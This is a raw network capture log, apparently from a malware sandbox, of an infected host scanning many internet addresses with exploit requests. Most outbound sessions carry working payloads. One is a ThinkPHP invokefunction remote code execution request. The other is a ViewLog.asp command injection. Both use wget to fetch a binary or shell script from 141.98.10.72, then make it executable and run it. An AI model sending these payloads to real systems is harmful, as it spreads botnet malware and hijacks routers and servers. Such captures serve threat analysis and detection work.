Feb 14, 2024 09:30:21.250099897 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:21.367502928 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:21 GMT Date: Wed, 14 Feb 2024 08:30:21 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 62 64 37 64 64 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 31 26 23 34 36 3b 66 30 39 36 32 66 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.1bd7dd17.1707899421.f0962fd</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
627	192.168.2.15	37760	85.10.151.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:21.496530056 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:21.701271057 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 14 Feb 2024 08:30:21 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
628	192.168.2.15	59574	94.122.3.126	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:21.540848017 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
629	192.168.2.15	46974	94.120.235.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:21.542365074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
630	192.168.2.15	56312	95.101.214.35	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:21.588243008 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:21.808964968 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:21 GMT Date: Wed, 14 Feb 2024 08:30:21 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 65 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 31 26 23 34 36 3b 31 36 33 63 66 31 39 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2e0b1502.1707899421.163cf193</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
631	192.168.2.15	43980	62.74.158.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:21.761744022 CET	300	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.
Feb 14, 2024 09:30:22.048152924 CET	498	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Protected" Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright © 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
632	192.168.2.15	51284	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:22.043843985 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:52Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
633	192.168.2.15	51414	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:22.743155956 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:53Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
634	192.168.2.15	54092	95.164.206.33	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.190150976 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.309032917 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/3.5.20 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:30:23 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3560 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:8080 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-famil

Session ID	Source IP	Source Port	Destination IP	Destination Port
635	192.168.2.15	40138	95.179.246.147	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.272264004 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.474416018 CET	433	IN	HTTP/1.1 404 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Max-Age: 3600 Access-Control-Allow-Headers: * X-Application-Context: application Content-Type: application/json;charset=UTF-8 Transfer-Encoding: chunked Date: Wed, 14 Feb 2024 08:30:23 GMT Data Raw: 37 62 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 37 38 39 39 34 32 33 33 37 38 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 20 6d 65 73 73 61 67 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a Data Ascii: 7b{"timestamp":1707899423378,"status":404,"error":"Not Found","message":"No message available","path":"/cgi-bin/ViewLog.asp"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
636	192.168.2.15	47956	85.191.4.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.281725883 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.497394085 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 14 Feb 2024 08:30:23 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
637	192.168.2.15	59044	94.210.210.46	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.290554047 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
638	192.168.2.15	47870	94.121.55.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.316791058 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
639	192.168.2.15	57196	31.200.7.144	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.318203926 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
640	192.168.2.15	55580	62.29.52.88	8080

Timestamp	Bytes transferred	Direction	Data
